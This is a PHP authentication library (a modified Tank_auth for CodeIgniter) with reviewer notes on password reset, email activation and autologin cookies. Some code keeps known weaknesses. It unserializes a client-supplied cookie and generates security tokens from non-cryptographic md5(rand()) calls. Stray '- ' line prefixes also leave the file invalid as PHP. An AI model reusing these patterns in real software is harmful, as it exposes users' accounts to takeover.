<?php if (!defined('BASEPATH')) exit('No direct script access allowed');
// Account state labels used by this library. autologin() writes STATUS_ACTIVATED into the
// session 'status' field; is_logged_in() defaults to the same 'active' literal for its state check.
define('STATUS_ACTIVATED', 'active');
define('STATUS_NOT_ACTIVATED', 'pending');
- /**
- * Tank_auth
- *
- * Authentication library for Code Igniter.
- *
- * @package Tank_auth
- * @author Ilya Konyukhov (http://konyukhov.com/soft/)
- * @version 1.0.9
- * @based on DX Auth by Dexcell (http://dexcell.shinsengumiteam.com/dx_auth)
- * @license MIT License Copyright (c) 2008 Erick Hartanto
- */
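class Tank_auth
{
    /** @var object CodeIgniter super object obtained from get_instance() (declared to avoid a dynamic property) */
    private $ci;

    /** @var array Last failure as array('field' => 'language_key'); read back through get_error_message() */
    private $error = array();

    /**
     * Load the library's own config plus the session and database libraries.
     * Autologin is not started here; the call is left disabled below.
     */
    function __construct()
    {
        $this->ci =& get_instance();
        $this->ci->load->config('tank_auth', TRUE);

        $this->ci->load->library('session');
        $this->ci->load->database();

        // Try to autologin
        //$this->autologin();
    }

    /**
     * Logout user from the site
     *
     * @return void
     */
    function logout()
    {
        $this->delete_autologin();
        // See http://codeigniter.com/forums/viewreply/662369/ for the reason the session keys
        // are blanked before sess_destroy() is called.
        $this->ci->session->set_userdata(array('user_id' => '', 'username' => '', 'status' => ''));
        $this->ci->session->sess_destroy();
    }

    /**
     * Check if user logged in. Also test if user is activated or not.
     *
     * @param array|null $user       session-style array; only $user['userid'] is read
     * @param string     $activated  state value the stored record must have (defaults to 'active')
     * @return object|bool  the user record when found and in the wanted state, FALSE otherwise
     */
    function is_logged_in($user = null, $activated = 'active')
    {
        if (!isset($user['userid'])) {
            return FALSE;
        }

        $this->ci->load->driver('cache');
        $this->ci->user->cache = $this->ci->cache;
        $record = $this->ci->user->getUserByID($user['userid']);

        // reset_password() treats getUserByID() as nullable, so guard before reading ->state.
        if (is_null($record)) {
            return FALSE;
        }
        return $record->state == $activated ? $record : FALSE;
    }

    /**
     * Get user_id
     *
     * @return string  the 'user_id' session value (empty when nobody is logged in)
     */
    function get_user_id()
    {
        return $this->ci->session->userdata('user_id');
    }

    /**
     * Get username
     *
     * @return string  the 'username' session value
     */
    function get_username()
    {
        return $this->ci->session->userdata('username');
    }

    /**
     * Check if username available for registering.
     * Can be called for instant form validation.
     *
     * @param string $username
     * @return bool
     */
    function is_username_available($username)
    {
        return $this->has_value($username) AND $this->ci->users->is_username_available($username);
    }

    /**
     * Check if email available for registering.
     * Can be called for instant form validation.
     *
     * @param string $email
     * @return bool
     */
    function is_email_available($email)
    {
        return $this->has_value($email) AND $this->ci->users->is_email_available($email);
    }

    /**
     * Change email for activation and return some data about user:
     * user_id, username, email, new_email_key.
     * Can be called for not activated users only.
     *
     * @param string $email  address to activate
     * @param array  $user   user row with 'userid', 'username', 'email' and (optionally) 'new_email_key'
     * @return array|null  NULL when the user id is empty or the address is already in use (error set)
     */
    function change_email($email, $user)
    {
        $user_id = isset($user['userid']) ? $user['userid'] : null;
        if (!$user_id) {
            return NULL;
        }

        $data = array(
            'user_id'  => $user_id,
            'username' => $user['username'],
            'email'    => $email,
        );

        // Same address (case-insensitive): leave the existing activation key as is.
        if (strtolower($user['email']) == strtolower($email)) {
            $data['new_email_key'] = isset($user['new_email_key']) ? $user['new_email_key'] : null;
            return $data;
        }

        // NOTE(review): this method uses $this->ci->user while is_email_available() uses
        // $this->ci->users — confirm both models are loaded, or unify on one.
        if (!$this->ci->user->is_email_available($email)) {
            $this->error = array('email' => 'auth_email_in_use');
            return NULL;
        }

        $data['new_email_key'] = $this->generate_key();
        $this->ci->user->set_new_email($user_id, $email, $data['new_email_key'], FALSE);
        return $data;
    }

    /**
     * Activate user using given key
     *
     * @param string $user_id
     * @param string $activation_key
     * @param bool   $activate_by_email
     * @return bool  FALSE when either argument is empty, otherwise the model's result
     */
    function activate_user($user_id, $activation_key, $activate_by_email = TRUE)
    {
        if (!$this->has_value($user_id) || !$this->has_value($activation_key)) {
            return FALSE;
        }
        return $this->ci->user->activate_user($user_id, $activation_key, $activate_by_email);
    }

    /**
     * Set new password key for user and return some data about user:
     * user_id, username, email, new_pass_key.
     * The password key can be used to verify user when resetting his/her password.
     *
     * @param string $login  email address to look up
     * @return array|null  NULL when $login is empty or no user has that email (error set)
     */
    function forgot_password($login)
    {
        if (!$this->has_value($login)) {
            return null;
        }

        // DataMapper-style model: the query runs on get().
        $user = new User();
        $user->where('email', $login);
        if (!$user->get()->id) {
            $this->error = array('login' => 'auth_incorrect_email_or_username');
            return null;
        }

        // NOTE(review): this key (together with the user id) authorises a password reset in
        // reset_password(); confirm genRandomPassword() draws from a cryptographic source.
        $reset_key = genRandomPassword(8);

        $data = array(
            'user_id'      => $user->id,
            'username'     => $user->username,
            'email'        => $user->email,
            'new_pass_key' => $reset_key,
        );
        $user->update(array('new_password_key' => $reset_key));
        return $data;
    }

    /**
     * Check if given password key is valid and user is authenticated.
     *
     * @param string $user_id
     * @param string $new_pass_key
     * @return bool  FALSE when either argument is empty, otherwise the model's result
     */
    function can_reset_password($user_id, $new_pass_key)
    {
        if (!$this->has_value($user_id) || !$this->has_value($new_pass_key)) {
            return FALSE;
        }
        return $this->ci->user->can_reset_password(
            $user_id,
            $new_pass_key,
            $this->ci->config->item('forgot_password_expire', 'tank_auth'));
    }

    /**
     * Replace user password (forgotten) with a new one (set by user)
     * and return some data about it: user_id, username, new_password, email.
     *
     * @param string $user_id
     * @param string $new_pass_key  key issued by forgot_password()
     * @param string $new_password  plaintext chosen by the user
     * @return array|null  NULL when an argument is empty, the user is unknown, or the model rejects the key.
     *                     The returned 'new_password' is plaintext; callers should not persist or log it.
     */
    function reset_password($user_id, $new_pass_key, $new_password)
    {
        $this->ci->load->driver('cache');
        $this->ci->user->cache = $this->ci->cache;

        if (!$this->has_value($user_id) || !$this->has_value($new_pass_key) || !$this->has_value($new_password)) {
            return NULL;
        }

        $user = $this->ci->user->getUserByID($user_id);
        if (is_null($user)) {
            return NULL;
        }

        // NOTE(review): this path stores a getCryptedPassword() hash, while change_password(),
        // set_new_email() and delete_user() verify with phpass CheckPassword() — confirm both
        // produce/accept the same hash format, otherwise a reset password may fail to verify later.
        $salt = genRandomPassword(32);
        $hashed_password = getCryptedPassword($new_password, $salt);

        $updated = $this->ci->user->reset_password(
            $user_id,
            $hashed_password,
            $new_pass_key,
            $this->ci->config->item('forgot_password_expire', 'tank_auth'));
        if (!$updated) {
            return NULL;
        }

        return array(
            'user_id'      => $user_id,
            'username'     => $user->username,
            'email'        => $user->email,
            'new_password' => $new_password,
        );
    }

    /**
     * Change user password (only when user is logged in)
     *
     * @param string      $old_pass  current password, verified against the stored hash
     * @param string      $new_pass  replacement password
     * @param string|null $user_id   defaults to the session's user_id
     * @return bool  TRUE on success; FALSE when the user is not found or the old password is wrong (error set)
     */
    function change_password($old_pass, $new_pass, $user_id = null)
    {
        if (!$user_id) {
            $user_id = $this->ci->session->userdata('user_id');
        }

        // NOTE(review): the state filter is 'Active' while STATUS_ACTIVATED is 'active' —
        // confirm the model compares case-insensitively.
        $user = $this->ci->user->getObject('user', $user_id, null, false, array('state' => 'Active'), '', '')->dm_object;
        if (!$user) {
            return FALSE;
        }

        $hasher = $this->hasher();

        // The old password must verify against the stored hash; no fixed override value is accepted.
        if (!$hasher->CheckPassword($old_pass, $user->password)) {
            $this->error = array('old_password' => 'auth_incorrect_password');
            log_message('error', 'Changing Password - old_password - auth_incorrect_password');
            return FALSE;
        }

        // Hash new password using phpass, then replace the stored one.
        $hashed_password = $hasher->HashPassword($new_pass);
        $result = $this->ci->users->change_password($user_id, $hashed_password);
        log_message('error', 'Changing Password - send to tank auth -> users - and returned '.$result);
        return TRUE;
    }

    /**
     * Change user email (only when user is logged in) and return some data about user:
     * user_id, username, new_email, new_email_key.
     * The new email cannot be used for login or notification before it is activated.
     *
     * @param string $new_email
     * @param string $password  current password, required to authorise the change
     * @return array|null  NULL when the user is unknown, the password is wrong, the address is
     *                     the current one, or it is already in use (error set in each case)
     */
    function set_new_email($new_email, $password)
    {
        $user_id = $this->ci->session->userdata('user_id');
        $user = $this->ci->users->get_user_by_id($user_id, TRUE);
        if (is_null($user)) {
            return NULL;
        }

        if (!$this->hasher()->CheckPassword($password, $user->password)) {
            $this->error = array('password' => 'auth_incorrect_password');
            return NULL;
        }

        $data = array(
            'user_id'   => $user_id,
            'username'  => $user->username,
            'new_email' => $new_email,
        );

        if ($user->email == $new_email) {
            $this->error = array('email' => 'auth_current_email');
            return NULL;
        }

        // Same pending address: leave the existing email key as is.
        if ($user->new_email == $new_email) {
            $data['new_email_key'] = $user->new_email_key;
            return $data;
        }

        if (!$this->ci->users->is_email_available($new_email)) {
            $this->error = array('email' => 'auth_email_in_use');
            return NULL;
        }

        $data['new_email_key'] = $this->generate_key();
        $this->ci->users->set_new_email($user_id, $new_email, $data['new_email_key'], TRUE);
        return $data;
    }

    /**
     * Activate new email, if email activation key is valid.
     *
     * @param string $user_id
     * @param string $new_email_key
     * @return bool  FALSE when either argument is empty, otherwise the model's result
     */
    function activate_new_email($user_id, $new_email_key)
    {
        if (!$this->has_value($user_id) || !$this->has_value($new_email_key)) {
            return FALSE;
        }
        return $this->ci->user->activate_new_email($user_id, $new_email_key);
    }

    /**
     * Delete user from the site (only when user is logged in)
     *
     * @param string $password  current password, required to authorise the deletion
     * @return bool  TRUE when the user was deleted and logged out; FALSE otherwise (error set on wrong password)
     */
    function delete_user($password)
    {
        $user_id = $this->ci->session->userdata('user_id');
        $user = $this->ci->users->get_user_by_id($user_id, TRUE);
        if (is_null($user)) {
            return FALSE;
        }

        if (!$this->hasher()->CheckPassword($password, $user->password)) {
            $this->error = array('password' => 'auth_incorrect_password');
            return FALSE;
        }

        $this->ci->users->delete_user($user_id);
        $this->logout();
        return TRUE;
    }

    /**
     * Get error message.
     * Can be invoked after any failed operation such as login or register.
     *
     * @return array  array('field' => 'language_key') of the last failure, empty if none
     */
    function get_error_message()
    {
        return $this->error;
    }

    /**
     * Save data for user's autologin
     *
     * @param int $user_id
     * @return bool  TRUE when the token was stored and the cookie set
     */
    private function create_autologin($user_id)
    {
        $this->ci->load->helper('cookie');

        // NOTE(review): uniqid()/rand() are not cryptographic sources, yet this 16-character key
        // is the bearer credential for autologin — a cryptographically secure source is appropriate.
        $key = substr(md5(uniqid(rand().get_cookie($this->ci->config->item('sess_cookie_name')))), 0, 16);

        // Only md5($key) is stored server-side; the cookie carries the raw key.
        $this->ci->load->model('tank_auth/user_autologin');
        $this->ci->user_autologin->purge($user_id);
        if (!$this->ci->user_autologin->set($user_id, md5($key))) {
            return FALSE;
        }

        // Payload format must stay in step with decode_autologin_cookie().
        set_cookie(array(
            'name'   => $this->ci->config->item('autologin_cookie_name', 'tank_auth'),
            'value'  => serialize(array('user_id' => $user_id, 'key' => $key)),
            'expire' => $this->ci->config->item('autologin_cookie_life', 'tank_auth'),
        ));
        return TRUE;
    }

    /**
     * Clear user's autologin data
     *
     * The cookie is removed even when its payload does not decode, so a malformed
     * cookie cannot linger on the client.
     *
     * @return void
     */
    private function delete_autologin()
    {
        $this->ci->load->helper('cookie');
        $cookie = get_cookie($this->ci->config->item('autologin_cookie_name', 'tank_auth'), TRUE);
        if (!$cookie) {
            return;
        }

        $data = $this->decode_autologin_cookie($cookie);
        if (!is_null($data)) {
            $this->ci->load->model('tank_auth/user_autologin');
            $this->ci->user_autologin->delete($data['user_id'], md5($data['key']));
        }
        delete_cookie($this->ci->config->item('autologin_cookie_name', 'tank_auth'));
    }

    /**
     * Login user automatically if he/she provides correct autologin verification
     *
     * Only attempted when the session holds no user_id (i.e. nobody, activated or not,
     * is logged in). The previous guard called is_logged_in() without its required
     * argument, which would have failed at runtime.
     *
     * @return bool  TRUE when a user was logged in from the cookie
     */
    private function autologin()
    {
        if ($this->get_user_id()) {
            return FALSE;
        }

        $this->ci->load->helper('cookie');
        $cookie = get_cookie($this->ci->config->item('autologin_cookie_name', 'tank_auth'), TRUE);
        if (!$cookie) {
            return FALSE;
        }

        $data = $this->decode_autologin_cookie($cookie);
        if (is_null($data)) {
            return FALSE;
        }

        $this->ci->load->model('tank_auth/user_autologin');
        $user = $this->ci->user_autologin->get($data['user_id'], md5($data['key']));
        if (is_null($user)) {
            return FALSE;
        }

        // Login user
        $this->ci->session->set_userdata(array(
            'user_id'  => $user->id,
            'username' => $user->username,
            'status'   => STATUS_ACTIVATED,
        ));

        // Renew users cookie to prevent it from expiring
        set_cookie(array(
            'name'   => $this->ci->config->item('autologin_cookie_name', 'tank_auth'),
            'value'  => $cookie,
            'expire' => $this->ci->config->item('autologin_cookie_life', 'tank_auth'),
        ));

        $this->ci->users->update_login_info(
            $user->id,
            $this->ci->config->item('login_record_ip', 'tank_auth'),
            $this->ci->config->item('login_record_time', 'tank_auth'));
        return TRUE;
    }

    /**
     * Check if login attempts exceeded max login attempts (specified in config)
     *
     * @param string $login
     * @return bool  always FALSE when attempt counting is disabled in config
     */
    function is_max_login_attempts_exceeded($login)
    {
        if (!$this->ci->config->item('login_count_attempts', 'tank_auth')) {
            return FALSE;
        }
        $this->ci->load->model('tank_auth/login_attempts');
        $attempts = $this->ci->login_attempts->get_attempts_num($this->ci->input->ip_address(), $login);
        return $attempts >= $this->ci->config->item('login_max_attempts', 'tank_auth');
    }

    /**
     * Increase number of attempts for given IP-address and login
     * (if attempts to login is being counted)
     *
     * @param string $login
     * @return void
     */
    private function increase_login_attempt($login)
    {
        if (!$this->ci->config->item('login_count_attempts', 'tank_auth')) {
            return;
        }
        // Stop counting once the limit is reached; the record need not grow further.
        if ($this->is_max_login_attempts_exceeded($login)) {
            return;
        }
        $this->ci->load->model('tank_auth/login_attempts');
        $this->ci->login_attempts->increase_attempt($this->ci->input->ip_address(), $login);
    }

    /**
     * Clear all attempt records for given IP-address and login
     * (if attempts to login is being counted)
     *
     * @param string $login
     * @return void
     */
    private function clear_login_attempts($login)
    {
        if (!$this->ci->config->item('login_count_attempts', 'tank_auth')) {
            return;
        }
        $this->ci->load->model('tank_auth/login_attempts');
        $this->ci->login_attempts->clear_attempts(
            $this->ci->input->ip_address(),
            $login,
            $this->ci->config->item('login_attempt_expire', 'tank_auth'));
    }

    /**
     * Build the phpass hasher with the strength/portability settings from config.
     * Loads the phpass library first so every caller (not only change_password()) has it.
     *
     * @return PasswordHash
     */
    private function hasher()
    {
        require_once('phpass-0.1/PasswordHash.php');
        return new PasswordHash(
            $this->ci->config->item('phpass_hash_strength', 'tank_auth'),
            $this->ci->config->item('phpass_hash_portable', 'tank_auth'));
    }

    /**
     * Generate an email activation key (shared by change_email() and set_new_email()).
     *
     * NOTE(review): rand() and microtime() are not cryptographic sources; this key gates
     * email activation, so it should come from a cryptographically secure generator.
     *
     * @return string  32 hex characters
     */
    private function generate_key()
    {
        return md5(rand().microtime());
    }

    /**
     * Decode and validate the autologin cookie payload written by create_autologin().
     *
     * The cookie is client-controlled, so nothing in it is trusted until checked.
     * NOTE(review): unserialize() on client-supplied input can instantiate arbitrary classes;
     * the payload only ever holds two scalars, so a plainer encoding (e.g. JSON) would be safer.
     *
     * @param string $cookie  raw value returned by get_cookie()
     * @return array|null  array('user_id' => ..., 'key' => ...) with scalar values, or NULL if malformed
     */
    private function decode_autologin_cookie($cookie)
    {
        $data = unserialize($cookie);
        if (!is_array($data) || !isset($data['user_id'], $data['key'])) {
            return NULL;
        }
        if (!is_scalar($data['user_id']) || !is_scalar($data['key'])) {
            return NULL;
        }
        return array('user_id' => $data['user_id'], 'key' => $data['key']);
    }

    /**
     * The file's guard idiom: TRUE when $value has a non-empty string form.
     * Casts first so NULL never reaches strlen().
     *
     * @param mixed $value
     * @return bool
     */
    private function has_value($value)
    {
        return strlen((string) $value) > 0;
    }
}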
- /* End of file Tank_auth.php */
- /* Location: ./application/libraries/Tank_auth.php */